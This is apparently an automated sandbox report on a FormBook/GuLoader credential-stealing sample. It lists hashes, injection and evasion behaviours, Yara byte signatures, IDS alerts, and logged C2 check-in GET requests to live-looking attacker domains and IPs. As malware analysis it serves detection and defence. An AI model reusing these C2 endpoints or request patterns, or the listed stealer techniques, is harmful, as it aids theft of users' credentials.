Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Aposporogony.exe

Overview

General Information

Sample Name:Aposporogony.exe
Analysis ID:751076
MD5:7cc14b0b7f4c470c20864d25bcc2db3d
SHA1:96d74402bf9ad05e7cdbbe8fbba10c5e8d5220e8
SHA256:49a73b28d4122d560e987d24674e9e5e0038aa6c56e83e07b43c383b5b29ff44
Infos:

Detection

FormBook, GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Writes to foreign memory regions
Tries to detect Any.run
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Found large amount of non-executed APIs
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality for read data from the clipboard

Classification

  • System is w10x64native
  • Aposporogony.exe (PID: 5384 cmdline: C:\Users\user\Desktop\Aposporogony.exe MD5: 7CC14B0B7F4C470C20864D25BCC2DB3D)
    • Aposporogony.exe (PID: 6960 cmdline: C:\Users\user\Desktop\Aposporogony.exe MD5: 7CC14B0B7F4C470C20864D25BCC2DB3D)
      • RAVCpl64.exe (PID: 7648 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • mstsc.exe (PID: 7384 cmdline: C:\Windows\SysWOW64\mstsc.exe MD5: B038F39C887BE2A810E20B08613F3B84)
          • explorer.exe (PID: 4844 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
          • firefox.exe (PID: 8080 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
{"C2 list": ["www.xiaoxiuzhen.com/nqhc/"]}
SourceRuleDescriptionAuthorStrings
00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x1a0d9:$sqlite3step: 68 34 1C 7B E1
    • 0x1ac51:$sqlite3step: 68 34 1C 7B E1
    • 0x1a11b:$sqlite3text: 68 38 2A 90 C5
    • 0x1ac96:$sqlite3text: 68 38 2A 90 C5
    • 0x1a132:$sqlite3blob: 68 53 D8 7F 8C
    • 0x1acac:$sqlite3blob: 68 53 D8 7F 8C
    00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x17be5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x17691:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x17ce7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x17e5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa47a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x168dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0x1ddd7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1edca:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x6611:$a1: 3C 30 50 4F 53 54 74 09 40
    • 0x1f060:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0xa8af:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    • 0x17de7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
    00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      Click to see the 27 entries
      No Sigma rule has matched
      Timestamp:192.168.11.20192.185.32.15749893802031449 11/21/22-19:24:07.554896
      SID:2031449
      Source Port:49893
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749837802031453 11/21/22-19:20:48.332938
      SID:2031453
      Source Port:49837
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.101.158.23949867802031449 11/21/22-19:22:29.555793
      SID:2031449
      Source Port:49867
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749837802031412 11/21/22-19:20:48.332938
      SID:2031412
      Source Port:49837
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20194.245.148.18949863802031449 11/21/22-19:22:18.340101
      SID:2031449
      Source Port:49863
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449885802031412 11/21/22-19:23:43.670047
      SID:2031412
      Source Port:49885
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549909802031449 11/21/22-19:25:04.539756
      SID:2031449
      Source Port:49909
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20194.245.148.18949863802031453 11/21/22-19:22:18.340101
      SID:2031453
      Source Port:49863
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449885802031453 11/21/22-19:23:43.670047
      SID:2031453
      Source Port:49885
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449829802031453 11/21/22-19:20:23.527011
      SID:2031453
      Source Port:49829
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549855802031449 11/21/22-19:21:46.471516
      SID:2031449
      Source Port:49855
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449829802031412 11/21/22-19:20:23.527011
      SID:2031412
      Source Port:49829
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749837802031449 11/21/22-19:20:48.332938
      SID:2031449
      Source Port:49837
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.101.158.23949867802031453 11/21/22-19:22:29.555793
      SID:2031453
      Source Port:49867
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20185.101.158.23949867802031412 11/21/22-19:22:29.555793
      SID:2031412
      Source Port:49867
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.201.1.1.149583532014169 11/21/22-19:20:17.053336
      SID:2014169
      Source Port:49583
      Destination Port:53
      Protocol:UDP
      Classtype:Potentially Bad Traffic
      Timestamp:192.168.11.20192.185.32.15749893802031412 11/21/22-19:24:07.554896
      SID:2031412
      Source Port:49893
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20194.245.148.18949863802031412 11/21/22-19:22:18.340101
      SID:2031412
      Source Port:49863
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549909802031453 11/21/22-19:25:04.539756
      SID:2031453
      Source Port:49909
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20192.185.32.15749893802031453 11/21/22-19:24:07.554896
      SID:2031453
      Source Port:49893
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549909802031412 11/21/22-19:25:04.539756
      SID:2031412
      Source Port:49909
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549855802031412 11/21/22-19:21:46.471516
      SID:2031412
      Source Port:49855
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.20103.63.2.17549855802031453 11/21/22-19:21:46.471516
      SID:2031453
      Source Port:49855
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449829802031449 11/21/22-19:20:23.527011
      SID:2031449
      Source Port:49829
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected
      Timestamp:192.168.11.2045.130.41.2449885802031449 11/21/22-19:23:43.670047
      SID:2031449
      Source Port:49885
      Destination Port:80
      Protocol:TCP
      Classtype:A Network Trojan was detected

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: Aposporogony.exeVirustotal: Detection: 9%Perma Link
      Source: Yara matchFile source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2167661567.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580637298.0000000004320000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6566682514.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000005.00000000.2175496471.000000000076B000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000004.00000002.2239453620.000000001D4A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.6580116972.00000000042F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
      Source: http://www.botbillionsblaze.website/nqhc/?r4txB=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&1b=S8jDAvira URL Cloud: Label: malware
      Source: http://www.botbillionsblaze.website/nqhc/Avira URL Cloud: Label: malware
      Source: 0.2.Aposporogony.exe.410937.1.unpackAvira: Label: TR/Patched.Ren.Gen3
      Source: 00000004.00000002.2220881682.0000000000060000.00000040.10000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.xiaoxiuzhen.com/nqhc/"]}
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00414640 CryptUnprotectData,6_2_00414640
      Source: Aposporogony.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: C:\Users\user\Desktop\Aposporogony.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Phloroglucic\Poisonings\Gytling\IstandJump to behavior
      Source: unknownHTTPS traffic detected: 142.250.185.78:443 -> 192.168.11.20:49818 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.185.161:443 -> 192.168.11.20:49819 version: TLS 1.2
      Source: Aposporogony.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: wntdll.pdbUGP source: Aposporogony.exe, 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2017191835.000000001D4AA000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2023445771.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2225655729.000000000440A000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2220670268.000000000425B000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: wntdll.pdb source: Aposporogony.exe, Aposporogony.exe, 00000004.00000002.2242251586.000000001D810000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2244545671.000000001D93D000.00000040.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2017191835.000000001D4AA000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2023445771.000000001D65F000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, mstsc.exe, 00000006.00000003.2225655729.000000000440A000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6581382937.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000002.6585251641.00000000046DD000.00000040.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2220670268.000000000425B000.00000004.00000800.00020000.00000000.sdmp
      Source: Binary string: mstsc.pdbGCTL source: Aposporogony.exe, 00000004.00000003.2210470359.000000001D613000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2213382254.000000001DB63000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2240646207.000000001D610000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: mstsc.pdb source: Aposporogony.exe, 00000004.00000003.2210470359.000000001D613000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000003.2213382254.000000001DB63000.00000004.00000800.00020000.00000000.sdmp, Aposporogony.exe, 00000004.00000002.2240646207.000000001D610000.00000040.10000000.00040000.00000000.sdmp
      Source: Binary string: firefox.pdb source: mstsc.exe, 00000006.00000003.2922634509.0000000007417000.00000004.00000800.00020000.00000000.sdmp, mstsc.exe, 00000006.00000003.2985837581.000000000759F000.00000004.00000800.00020000.00000000.sdmp
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_0040672B FindFirstFileW,FindClose,0_2_0040672B
      Source: C:\Users\user\Desktop\Aposporogony.exeCode function: 0_2_00405AFA CloseHandle,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AFA
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 6_2_00412C80 FindFirstFileW,FindNextFileW,FindClose,6_2_00412C80
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi6_2_00408880
      Source: C:\Windows\SysWOW64\mstsc.exeCode function: 4x nop then pop edi6_2_0040887F

      Networking

      barindex
      Source: C:\Windows\explorer.exeNetwork Connect: 154.204.24.45 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.185.32.157 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 194.245.148.189 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 96.43.100.185 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 192.232.217.125 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 217.160.0.1 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 66.29.151.40 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 38.55.15.214 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.33.23.183 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 45.130.41.24 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 185.101.158.239 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 3.13.90.76 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 50.87.192.144 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 2.57.90.16 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 103.63.2.175 80Jump to behavior
      Source: C:\Windows\explorer.exeNetwork Connect: 195.24.68.23 80Jump to behavior
      Source: TrafficSnort IDS: 2014169 ET DNS Query for .su TLD (Soviet Union) Often Malware Related 192.168.11.20:49583 -> 1.1.1.1:53
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49829 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49837 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49837 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49837 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49855 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49855 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49855 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 194.245.148.189:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 194.245.148.189:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49863 -> 194.245.148.189:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 185.101.158.239:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 185.101.158.239:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49867 -> 185.101.158.239:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49885 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49885 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49885 -> 45.130.41.24:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49893 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49893 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49893 -> 192.185.32.157:80
      Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 103.63.2.175:80
      Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49909 -> 103.63.2.175:80
      Source: Malware configuration extractorURLs: www.xiaoxiuzhen.com/nqhc/
      Source: Joe Sandbox ViewASN Name: XIAOZHIYUN1-AS-APICIDCNETWORKUS XIAOZHIYUN1-AS-APICIDCNETWORKUS
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&1b=S8jD HTTP/1.1Host: www.labour-office.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&1b=S8jD HTTP/1.1Host: www.searchbot.suConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&1b=S8jD HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD HTTP/1.1Host: www.royaltechglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&1b=S8jD HTTP/1.1Host: www.xiaoxiuzhen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&1b=S8jD HTTP/1.1Host: www.gumba.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&1b=S8jD HTTP/1.1Host: www.botbillionsblaze.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&1b=S8jD HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&1b=S8jD HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=6/QR3dlMV8DnDzXq/IQFMQKijd2A7lxAIJkdxNKkhe40n6kgsPq7UgH72h9AXiRjRkbt4wliAP55gS4vzkyfbvVcBKnLGlwpJg==&1b=S8jD HTTP/1.1Host: www.apidachicago.orgConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=sPoIw5t6pqr53t/oApVsYQPYeQSIkYstTEU7jq7wUoyBdiYMXjDOpQvDe6hGJRv5cGRC4OofJ74gnHLDZXk1GBAfNVZPB7Yr2A==&1b=S8jD HTTP/1.1Host: www.funknive.chConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=YpBcfthyu6gwcnN/g9jRvpxtfUkdEaz6LsXfXUppEZSnE0c1g3RTY5b27kCACk8vV3w0fGJq4rusk2G49vjJdiO+izISunFXUA==&1b=S8jD HTTP/1.1Host: www.xn--29-oj9ik7b890b.netConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=nxEpVeNHnARypVRSWPzq+Yc9yhVf8J7idG64BP0ay1SSlgh8opdyHa7T5FU3HpxZiEIb1VwF2iL8pFHt356/ltXz75Eg7AD5bw==&1b=S8jD HTTP/1.1Host: www.phootka.ruConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=cCAegqK/nzfcR22oyFZFZLhv7+fwUp6Akkv27RFimicapgMUJBRfpG+MwKY/yKfw/XeAmq4HqwYY5KwMyaSJSZOUIGIe3VRiGA==&1b=S8jD HTTP/1.1Host: www.wellnessprodia.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=LdV+lgJdmfuEMP3jUfrE9r0MLHENHMoAvR3n1HnrztGZNsUQ943e3pzfBc8//iPa0aHj65ptHNl5my2qaj9ZRSJvwgLgjYR0TA==&1b=S8jD HTTP/1.1Host: www.labour-office.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=whxvAX76Kn/dsraFEG6OM4VHSLC6sVqO0rZz4tdexYeFc8oztoloeHnU5/yDvq6vrM0c8H7EZKwvMwvNWmxWHwyHX3Pe6w5pjw==&1b=S8jD HTTP/1.1Host: www.searchbot.suConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=MkuUvDTfzFLprDgv0d/zCzEj80YoaBEagpxYPCZUDQ8arMBq5slv03vCCvkVDe0A6/c8Ceh5Akj/CnOQLB+qucpYk5Fxn1TZTg==&1b=S8jD HTTP/1.1Host: www.youlian.fundConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=RArbiR8kGTfwvUfF12jr2giE5B3dEAwcjM/WknZipSSonmN/xNtrcN1ZKvLPmagqEcu1BGBCcvtDrHnt/goojoamQzAeoLFDeA==&1b=S8jD HTTP/1.1Host: www.royaltechglobal.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=NmysUK8Sf6DpSokzhdS+Fe7Tw5OPNsso476sAEQMN+xhSdBax7kHE0kXg2GXcVgvb7a1o1nVZ7aHbSSwUgvcnfixvrsa7oZKWA==&1b=S8jD HTTP/1.1Host: www.xiaoxiuzhen.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=f4F7ffrY91VPAaIYxk1J2He+DN38Gtglpvx7SxOWIh8xSFztRImtD0B4ZlSdLvIOg82xMJ3Gh/Bbh1FonXE4rjX3AOld5zRxFA==&1b=S8jD HTTP/1.1Host: www.gumba.shopConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=Jo9Ly5swECirkrz+Q2kB1mJjI2FdxMCd6ppqF2nJOFmXYuV8xeQe4DXLVR0s/AtaPMk93SVGZaQ/v2g/wIz4PNYN1ua2MlcQRg==&1b=S8jD HTTP/1.1Host: www.botbillionsblaze.websiteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=OyL0MBeXxkJ8chUEliFq9s6bwomTkxJ31rz9dsojrpNScTyiwKCDYYQmiQ8xCDXEzp0hbp4MCFP9aLVw4Be6pAeHIY4JilfakQ==&1b=S8jD HTTP/1.1Host: www.005404.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
      Source: global trafficHTTP traffic detected: GET /nqhc/?r4txB=1Yl+QUBI4kgCsXI3Vp53kl3xa1s40hGy3/rGU37TkiIZHr5R+30vzUqate7I4LnPvrrd2ZP58ux1HT0e4Ni8o787tXF+UCoQAg==&1b=S8jD HTTP/1.1Host: www.gouldent.siteConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
